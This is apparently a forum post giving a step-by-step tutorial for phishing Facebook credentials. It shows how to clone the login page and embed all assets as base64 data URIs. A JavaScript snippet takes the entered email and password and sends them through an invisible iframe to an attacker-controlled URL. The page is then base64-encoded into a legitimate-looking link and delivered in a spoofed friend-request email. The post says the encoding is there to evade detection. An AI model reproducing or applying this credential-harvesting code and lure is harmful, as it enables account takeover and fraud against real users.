Release date: 13/08/2016
1) Open [Enlace externo eliminado para invitados] and save the page with all elements.
2) Find a way to recreate the facebook logo. (Currently it's hidden in the code)
3) Search for a BASE64 encoder and convert all elements in URI format (.js, .css, .gif, .png)
Example: data:text/javascript;base64,ENCODE.CODE.HERE
Example: data:text/css;base64,ENCODE.CODE.HERE
Example: data:image/gif;base64,ENCODE.CODE.HERE
Example: data:image/javascript;base64,ENCODE.CODE.HERE
4) At this step all the content is in one file.
5) Open the html file and search for the first line saying (type="submit") and add a space and
Código: Seleccionar todo
onclick="myFunction();"
6) Open a notepad window and modify the script url below ([Enlace externo eliminado para invitados]) to a url you control.
Example: http://facebook_add_request.webhosting.com/index.html
Código: Seleccionar todo
<script>
function myFunction(){
var email = document.getElementById("email").value;
var pass = document.getElementById("pass").value;
document.write('<iframe src="http://127.0.0.1/index.html&email='+email+'&pass='+pass+'" frameborder="0" height="0" width="0"></iframe>');
}
</script>
8) Save the script encoded in the html file
Example: data:text/html;base64,ENCODE.CODE.HERE
9) Now the code is ready, copy all the html file and encode with the BASE64 again and use the following example
Example: data:text/html;[Enlace externo eliminado para invitados]
At this point the url will become legit! (Look at the format [Enlace externo eliminado para invitados])
10) Send a friend request from one facebook account to another to generate a friend request email in the inbox.
11) Get the email body. Copy to the notepad and alter the url with the example in step 9.
12) Visit [Enlace externo eliminado para invitados] and paste the email body with the masked url and send your spoof email to the target...
Note:
The reason why the file is encoded in base64 is to avoid detection and to run the file from the computer. Facebook blocks all ways to login and informs the target of any login request from a webhosted page.